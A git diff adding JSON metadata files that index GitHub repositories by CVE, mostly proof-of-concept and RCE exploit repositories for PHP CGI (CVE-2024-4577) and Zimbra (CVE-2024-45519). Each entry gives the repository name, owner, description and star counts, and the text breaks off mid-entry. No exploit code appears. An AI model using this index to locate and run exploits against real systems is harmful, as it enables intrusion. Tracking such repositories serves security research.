"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78846391?v=4", + "html_url": "https:\/\/github.com\/w0r1i0g1ht", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w0r1i0g1ht\/CVE-2024-45440", + "description": "Drupal CVE-2024-45440", + "fork": false, + "created_at": "2024-12-26T13:35:42Z", + "updated_at": "2024-12-30T06:27:01Z", + "pushed_at": "2024-12-29T13:56:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45492.json b/2024/CVE-2024-45492.json new file mode 100644 index 0000000000..1b8715a4f8 --- /dev/null +++ b/2024/CVE-2024-45492.json @@ -0,0 +1,33 @@ +[ + { + "id": 881829960, + "name": "external_expat_2.6.2_CVE-2024-45492", + "full_name": "nidhihcl75\/external_expat_2.6.2_CVE-2024-45492", + "owner": { + "login": "nidhihcl75", + "id": 176363052, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176363052?v=4", + "html_url": "https:\/\/github.com\/nidhihcl75", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nidhihcl75\/external_expat_2.6.2_CVE-2024-45492", + "description": null, + "fork": false, + "created_at": "2024-11-01T10:27:39Z", + "updated_at": "2024-11-01T13:59:38Z", + "pushed_at": "2024-11-01T11:23:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45507.json b/2024/CVE-2024-45507.json new file mode 100644 index 0000000000..880d202331 --- /dev/null +++ b/2024/CVE-2024-45507.json @@ -0,0 +1,33 @@ +[ + { + "id": 855621072, + "name": "CVE-2024-45507_Behinder_Webshell", + "full_name": "Avento\/CVE-2024-45507_Behinder_Webshell", + "owner": { + "login": "Avento", + "id": 13798539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13798539?v=4", + "html_url": "https:\/\/github.com\/Avento", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Avento\/CVE-2024-45507_Behinder_Webshell", + "description": null, + "fork": false, + "created_at": "2024-09-11T07:14:13Z", + "updated_at": "2024-09-12T01:46:38Z", + "pushed_at": "2024-09-12T01:46:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45519.json b/2024/CVE-2024-45519.json new file mode 100644 index 0000000000..7bef973f0f --- /dev/null +++ b/2024/CVE-2024-45519.json @@ -0,0 +1,131 @@ +[ + { + "id": 864444203, + "name": "CVE-2024-45519", + "full_name": "p33d\/CVE-2024-45519", + "owner": { + "login": "p33d", + "id": 123099747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123099747?v=4", + "html_url": "https:\/\/github.com\/p33d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p33d\/CVE-2024-45519", + "description": null, + "fork": false, + "created_at": "2024-09-28T08:29:06Z", + "updated_at": "2025-01-07T12:50:55Z", + "pushed_at": "2024-09-28T08:34:05Z", + "stargazers_count": 42, + "watchers_count": 42, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 19, + "watchers": 42, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 867894040, + "name": "CVE-2024-45519", + "full_name": "Chocapikk\/CVE-2024-45519", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-45519", + "description": "Zimbra - Remote Command Execution (CVE-2024-45519)", + "fork": false, + "created_at": "2024-10-05T00:15:18Z", + "updated_at": "2025-01-07T09:54:13Z", + "pushed_at": "2024-11-05T10:10:40Z", + "stargazers_count": 119, + "watchers_count": 119, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 119, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 886592882, + "name": "CVE-2024-45519", + "full_name": "whiterose7777\/CVE-2024-45519", + "owner": { + "login": "whiterose7777", + "id": 174041119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174041119?v=4", + "html_url": "https:\/\/github.com\/whiterose7777", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whiterose7777\/CVE-2024-45519", + "description": null, + "fork": false, + "created_at": "2024-11-11T08:57:44Z", + "updated_at": "2024-11-12T08:52:37Z", + "pushed_at": "2024-11-11T08:58:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892376259, + "name": "cve-2024-45519-poc", + "full_name": "XiaomingX\/cve-2024-45519-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-45519-poc", + "description": "CVE-2024-45519是Zimbra Collaboration(ZCS)中的一个高危漏洞,存在于其postjournal服务中。当该服务被启用时,未经身份验证的攻击者可以通过构造特定的SMTP请求,远程执行任意命令,从而完全控制受影响的服务器。", + "fork": false, + "created_at": "2024-11-22T01:56:21Z", + "updated_at": "2024-12-08T18:37:39Z", + "pushed_at": "2024-11-22T02:00:35Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exp", + "poc", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45589.json b/2024/CVE-2024-45589.json new file mode 100644 index 0000000000..729a9e263b --- /dev/null +++ b/2024/CVE-2024-45589.json @@ -0,0 +1,33 @@ +[ + { + "id": 852000766, + "name": "CVE-2024-45589", + "full_name": "BenRogozinski\/CVE-2024-45589", + "owner": { + "login": "BenRogozinski", + "id": 95942910, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95942910?v=4", + "html_url": "https:\/\/github.com\/BenRogozinski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BenRogozinski\/CVE-2024-45589", + "description": null, + "fork": false, + "created_at": "2024-09-04T03:45:33Z", + "updated_at": "2024-09-05T15:52:12Z", + "pushed_at": "2024-09-05T15:52:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-45614.json b/2024/CVE-2024-45614.json new file mode 100644 index 0000000000..4ebff692c4 --- /dev/null +++ b/2024/CVE-2024-45614.json @@ -0,0 +1,33 @@ +[ + { + "id": 864410545, + "name": "puma_header_normalization-CVE-2024-45614", + "full_name": "ooooooo-q\/puma_header_normalization-CVE-2024-45614", + "owner": { + "login": "ooooooo-q", + "id": 395584, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/395584?v=4", + "html_url": "https:\/\/github.com\/ooooooo-q", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ooooooo-q\/puma_header_normalization-CVE-2024-45614", + "description": "Puma Header normalization CVE-2024-45614 確認", + "fork": false, + "created_at": "2024-09-28T06:29:00Z", + "updated_at": "2024-10-01T13:30:41Z", + "pushed_at": "2024-10-01T13:30:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4573.json b/2024/CVE-2024-4573.json new file mode 100644 index 0000000000..a405c06717 --- /dev/null +++ b/2024/CVE-2024-4573.json @@ -0,0 +1,33 @@ +[ + { + "id": 910236713, + "name": "CVE-2024-4573-Mitigation-Script", + "full_name": "Castro-Ian\/CVE-2024-4573-Mitigation-Script", + "owner": { + "login": "Castro-Ian", + "id": 75397829, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75397829?v=4", + "html_url": "https:\/\/github.com\/Castro-Ian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Castro-Ian\/CVE-2024-4573-Mitigation-Script", + "description": null, + "fork": false, + "created_at": "2024-12-30T18:54:07Z", + "updated_at": "2024-12-30T18:58:24Z", + "pushed_at": "2024-12-30T18:58:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4577.json b/2024/CVE-2024-4577.json new file mode 100644 index 0000000000..d7f9c25a5c --- /dev/null +++ b/2024/CVE-2024-4577.json @@ -0,0 +1,1713 @@ +[ + { + "id": 811695573, + "name": "CVE-2024-4577", + "full_name": "TAM-K592\/CVE-2024-4577", + "owner": { + "login": "TAM-K592", + "id": 8276702, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8276702?v=4", + "html_url": "https:\/\/github.com\/TAM-K592", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TAM-K592\/CVE-2024-4577", + "description": "CVE-2024-4577 is a critical vulnerability in PHP affecting CGI configurations, allowing attackers to execute arbitrary commands via crafted URL parameters.", + "fork": false, + "created_at": "2024-06-07T05:50:23Z", + "updated_at": "2024-12-28T05:47:39Z", + "pushed_at": "2024-06-11T04:46:42Z", + "stargazers_count": 78, + "watchers_count": 78, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 78, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 811783487, + "name": "CVE-2024-4577", + "full_name": "ohhhh693\/CVE-2024-4577", + "owner": { + "login": "ohhhh693", + "id": 41501723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41501723?v=4", + "html_url": "https:\/\/github.com\/ohhhh693", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ohhhh693\/CVE-2024-4577", + "description": "CVE-2024-4577", + "fork": false, + "created_at": "2024-06-07T09:42:31Z", + "updated_at": "2024-06-07T10:30:02Z", + "pushed_at": "2024-06-07T10:29:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811783553, + "name": "CVE-2024-4577", + "full_name": "Junp0\/CVE-2024-4577", + "owner": { + "login": "Junp0", + "id": 69783084, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69783084?v=4", + "html_url": "https:\/\/github.com\/Junp0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Junp0\/CVE-2024-4577", + "description": "PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC", + "fork": false, + "created_at": "2024-06-07T09:42:40Z", + "updated_at": "2024-06-16T15:27:28Z", + "pushed_at": "2024-06-07T09:40:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 811785816, + "name": "CVE-2024-4577", + "full_name": "princew88\/CVE-2024-4577", + "owner": { + "login": "princew88", + "id": 165123229, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/165123229?v=4", + "html_url": "https:\/\/github.com\/princew88", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/princew88\/CVE-2024-4577", + "description": null, + "fork": false, + "created_at": "2024-06-07T09:48:36Z", + "updated_at": "2024-06-07T09:48:40Z", + "pushed_at": "2024-06-07T09:48:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811786940, + "name": "CVE-2024-4577", + "full_name": "11whoami99\/CVE-2024-4577", + "owner": { + "login": "11whoami99", + "id": 122907550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122907550?v=4", + "html_url": "https:\/\/github.com\/11whoami99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/11whoami99\/CVE-2024-4577", + "description": "POC & $BASH script for CVE-2024-4577", + "fork": false, + "created_at": "2024-06-07T09:51:39Z", + "updated_at": "2024-12-15T03:13:39Z", + "pushed_at": "2024-06-09T16:16:30Z", + "stargazers_count": 43, + "watchers_count": 43, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 43, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811787428, + "name": "CVE-2024-4577", + "full_name": "watchtowrlabs\/CVE-2024-4577", + "owner": { + "login": "watchtowrlabs", + "id": 99977116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99977116?v=4", + "html_url": "https:\/\/github.com\/watchtowrlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/watchtowrlabs\/CVE-2024-4577", + "description": "PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC", + "fork": false, + "created_at": "2024-06-07T09:52:54Z", + "updated_at": "2025-01-02T14:48:39Z", + "pushed_at": "2024-06-22T15:13:52Z", + "stargazers_count": 243, + "watchers_count": 243, + "has_discussions": false, + "forks_count": 52, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 52, + "watchers": 243, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 811787647, + "name": "CVE-2024-4577", + "full_name": "zjhzjhhh\/CVE-2024-4577", + "owner": { + "login": "zjhzjhhh", + "id": 64487620, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64487620?v=4", + "html_url": "https:\/\/github.com\/zjhzjhhh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zjhzjhhh\/CVE-2024-4577", + "description": "CVE-2024-4577", + "fork": false, + "created_at": "2024-06-07T09:53:32Z", + "updated_at": "2024-06-07T09:53:32Z", + "pushed_at": "2024-06-07T09:53:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811805923, + "name": "CVE-2024-4577-Nuclei-Template", + "full_name": "huseyinstif\/CVE-2024-4577-Nuclei-Template", + "owner": { + "login": "huseyinstif", + "id": 54823077, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54823077?v=4", + "html_url": "https:\/\/github.com\/huseyinstif", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huseyinstif\/CVE-2024-4577-Nuclei-Template", + "description": null, + "fork": false, + "created_at": "2024-06-07T10:40:37Z", + "updated_at": "2024-12-06T22:59:12Z", + "pushed_at": "2024-06-24T11:54:58Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811813168, + "name": "CVE-2024-4577", + "full_name": "taida957789\/CVE-2024-4577", + "owner": { + "login": "taida957789", + "id": 3710930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3710930?v=4", + "html_url": "https:\/\/github.com\/taida957789", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/taida957789\/CVE-2024-4577", + "description": null, + "fork": false, + "created_at": "2024-06-07T10:58:57Z", + "updated_at": "2024-06-17T19:38:41Z", + "pushed_at": "2024-06-07T11:05:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811856232, + "name": "CVE-2024-4577", + "full_name": "Wh02m1\/CVE-2024-4577", + "owner": { + "login": "Wh02m1", + "id": 21974999, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21974999?v=4", + "html_url": "https:\/\/github.com\/Wh02m1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wh02m1\/CVE-2024-4577", + "description": null, + "fork": false, + "created_at": "2024-06-07T12:49:20Z", + "updated_at": "2024-06-09T12:50:40Z", + "pushed_at": "2024-06-07T14:29:09Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811966277, + "name": "CVE-2024-4577", + "full_name": "Sysc4ll3r\/CVE-2024-4577", + "owner": { + "login": "Sysc4ll3r", + "id": 158176899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158176899?v=4", + "html_url": "https:\/\/github.com\/Sysc4ll3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sysc4ll3r\/CVE-2024-4577", + "description": "Nuclei Template for CVE-2024-4577", + "fork": false, + "created_at": "2024-06-07T17:01:20Z", + "updated_at": "2024-06-07T18:41:20Z", + "pushed_at": "2024-06-07T18:41:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811966807, + "name": "CVE-2024-4577-RCE-EXP", + "full_name": "WanLiChangChengWanLiChang\/CVE-2024-4577-RCE-EXP", + "owner": { + "login": "WanLiChangChengWanLiChang", + "id": 171075497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171075497?v=4", + "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang\/CVE-2024-4577-RCE-EXP", + "description": null, + "fork": false, + "created_at": "2024-06-07T17:02:52Z", + "updated_at": "2024-07-01T17:20:27Z", + "pushed_at": "2024-06-07T17:26:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812032307, + "name": "CVE-2024-4577", + "full_name": "BitMEXResearch\/CVE-2024-4577", + "owner": { + "login": "BitMEXResearch", + "id": 26349077, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26349077?v=4", + "html_url": "https:\/\/github.com\/BitMEXResearch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BitMEXResearch\/CVE-2024-4577", + "description": null, + "fork": false, + "created_at": "2024-06-07T20:10:49Z", + "updated_at": "2024-06-07T20:35:09Z", + "pushed_at": "2024-06-07T20:35:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812126791, + "name": "CVE-2024-4577-nuclei", + "full_name": "0x20c\/CVE-2024-4577-nuclei", + "owner": { + "login": "0x20c", + "id": 25526653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25526653?v=4", + "html_url": "https:\/\/github.com\/0x20c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x20c\/CVE-2024-4577-nuclei", + "description": "CVE-2024-4577 nuclei-templates", + "fork": false, + "created_at": "2024-06-08T03:12:28Z", + "updated_at": "2024-06-10T02:18:29Z", + "pushed_at": "2024-06-08T04:14:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812155900, + "name": "CVE-2024-4577", + "full_name": "manuelinfosec\/CVE-2024-4577", + "owner": { + "login": "manuelinfosec", + "id": 47338716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47338716?v=4", + "html_url": "https:\/\/github.com\/manuelinfosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/manuelinfosec\/CVE-2024-4577", + "description": "Proof Of Concept RCE exploit for critical vulnerability in PHP <8.2.15 (Windows), allowing attackers to execute arbitrary commands.", + "fork": false, + "created_at": "2024-06-08T05:27:44Z", + "updated_at": "2024-09-05T09:07:04Z", + "pushed_at": "2024-06-08T05:50:27Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812174425, + "name": "CVE-2024-4577", + "full_name": "zomasec\/CVE-2024-4577", + "owner": { + "login": "zomasec", + "id": 118324667, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118324667?v=4", + "html_url": "https:\/\/github.com\/zomasec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zomasec\/CVE-2024-4577", + "description": "CVE-2024-4577 Exploit POC ", + "fork": false, + "created_at": "2024-06-08T06:36:14Z", + "updated_at": "2024-07-08T11:32:59Z", + "pushed_at": "2024-06-09T16:47:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812271703, + "name": "CVE-2024-4577-PHP-RCE", + "full_name": "ZephrFish\/CVE-2024-4577-PHP-RCE", + "owner": { + "login": "ZephrFish", + "id": 5783068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4", + "html_url": "https:\/\/github.com\/ZephrFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZephrFish\/CVE-2024-4577-PHP-RCE", + "description": "PHP RCE PoC for CVE-2024-4577 written in bash, go, python and a nuclei template", + "fork": false, + "created_at": "2024-06-08T12:23:35Z", + "updated_at": "2024-12-20T16:00:38Z", + "pushed_at": "2024-06-19T16:19:57Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-4577", + "pentest", + "php", + "poc", + "rce-exploit", + "redteam" + ], + "visibility": "public", + "forks": 10, + "watchers": 26, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812283983, + "name": "CVE-2024-4577-PHP-RCE", + "full_name": "xcanwin\/CVE-2024-4577-PHP-RCE", + "owner": { + "login": "xcanwin", + "id": 14187349, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14187349?v=4", + "html_url": "https:\/\/github.com\/xcanwin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xcanwin\/CVE-2024-4577-PHP-RCE", + "description": "[漏洞复现] 全球首款利用PHP默认环境(XAMPP)的CVE-2024-4577 PHP-CGI RCE 漏洞 EXP。", + "fork": false, + "created_at": "2024-06-08T13:04:45Z", + "updated_at": "2024-12-29T08:00:56Z", + "pushed_at": "2024-07-21T20:27:03Z", + "stargazers_count": 127, + "watchers_count": 127, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 127, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812648512, + "name": "CVE-2024-4577", + "full_name": "dbyMelina\/CVE-2024-4577", + "owner": { + "login": "dbyMelina", + "id": 93864453, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93864453?v=4", + "html_url": "https:\/\/github.com\/dbyMelina", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dbyMelina\/CVE-2024-4577", + "description": "python poc编写练手,可以对单个目标或批量检测", + "fork": false, + "created_at": "2024-06-09T13:46:46Z", + "updated_at": "2024-06-09T13:48:02Z", + "pushed_at": "2024-06-09T13:47:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812658588, + "name": "CVE-2024-4577", + "full_name": "Chocapikk\/CVE-2024-4577", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-4577", + "description": "PHP CGI Argument Injection vulnerability", + "fork": false, + "created_at": "2024-06-09T14:18:21Z", + "updated_at": "2024-12-30T06:10:32Z", + "pushed_at": "2024-06-09T14:20:36Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 30, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812806796, + "name": "CVE-2024-4577-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2024-4577-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2024-4577-EXPLOIT", + "description": "A PoC exploit for CVE-2024-4577 - PHP CGI Argument Injection Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-06-09T23:32:11Z", + "updated_at": "2024-12-01T08:47:11Z", + "pushed_at": "2024-07-12T02:56:25Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "argument", + "code-injection", + "cve-2024-4577", + "exploit", + "php", + "php-cgi", + "poc", + "proof-of-concept", + "rce", + "rce-exploit", + "rce-scanner", + "remote-code-execution", + "xamp" + ], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 813698508, + "name": "CVE-2024-4577", + "full_name": "bl4cksku11\/CVE-2024-4577", + "owner": { + "login": "bl4cksku11", + "id": 81886705, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81886705?v=4", + "html_url": "https:\/\/github.com\/bl4cksku11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bl4cksku11\/CVE-2024-4577", + "description": "This is a PoC for PHP CVE-2024-4577.", + "fork": false, + "created_at": "2024-06-11T15:11:56Z", + "updated_at": "2024-06-11T15:29:25Z", + "pushed_at": "2024-06-11T15:29:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 813923060, + "name": "CVE-2024-4577", + "full_name": "nemu1k5ma\/CVE-2024-4577", + "owner": { + "login": "nemu1k5ma", + "id": 46486428, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46486428?v=4", + "html_url": "https:\/\/github.com\/nemu1k5ma", + "user_view_type": "public" + }, + "html_url": 